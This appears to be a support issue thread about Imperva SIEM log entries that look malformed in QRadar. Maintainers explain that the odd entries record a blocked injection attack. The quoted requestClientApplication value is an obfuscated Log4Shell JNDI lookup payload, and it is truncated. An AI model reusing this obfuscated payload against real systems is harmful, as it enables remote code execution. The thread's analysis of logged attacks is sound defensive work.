Closed manimmt closed 4 months ago
@manimmt do you know if you are using the masking feature in the general settings? I have not seen this issue before, Is the entire log like this of just some? https://docs.imperva.com/bundle/cloud-application-security/page/website-general-settings.htm
We are not using any mask. Some part of logs like this. And some other logs are completely ok. Also we are using beta script downloaded last year. This issue observed recently.
Thanks for the feedback @manimmt , one of my colleagues @AaronSeibert brought it to my attention that this might be an injection payload (attack). can you read the begin of the CEF entry and see if its NORMAL or other? CEF:0|Incapsula|SIEMintegration|1|1|Normal|0|
The beginning of payload seems normal. Refer below. (xxxx typed manually here to hide info)
<30> Feb 17 16:37:12 xxxx cwaf LEEF:1.0|Incapsula|SIEMintegration|1.0|Illegal Resource Access| fileId=xxxx sourceServiceName=xxxx siteid=xxxx suid=xxxx requestClientApplication=${${c:xf:tk:-j}${riom:h9gj:-n}${aif@manimmt - This is an Illegal Resource Access security event - so, this represents the fact that the platform recognized the malicious value of the requestClientApplication parameter, and the logging is working fine. It just looks strange because it is an injection attempt.
we are getting this strange format in qradar siem tool. Please let me know what need to be done.
requestClientApplication=${${fg2:fi:wa:-j}${mr:b:qe3p:-n}${x3:pvm:-d}${mby:m:-i}${tru:-:}${m:0ony:cv:-l}${6:-d}${k0ly:-a}${ax9e:c4h:-p}${cj8:-:}${6:-/}${epz:-/}${5ew:-U}${ni8:947:e:-A}${7u:r:v:-l}${v:to:6m:-0}${m:7w:8dzg:-c}${2c3e:h90:--}${${zj8q:4y:1:-s}${uxb:h2b:i:-y}${gxa8:ql7:r3:-s}${b:2:-:}${ib:u:o0bc:-j}${zu:-a}${d:ial:-v}${n1:jq:-a}$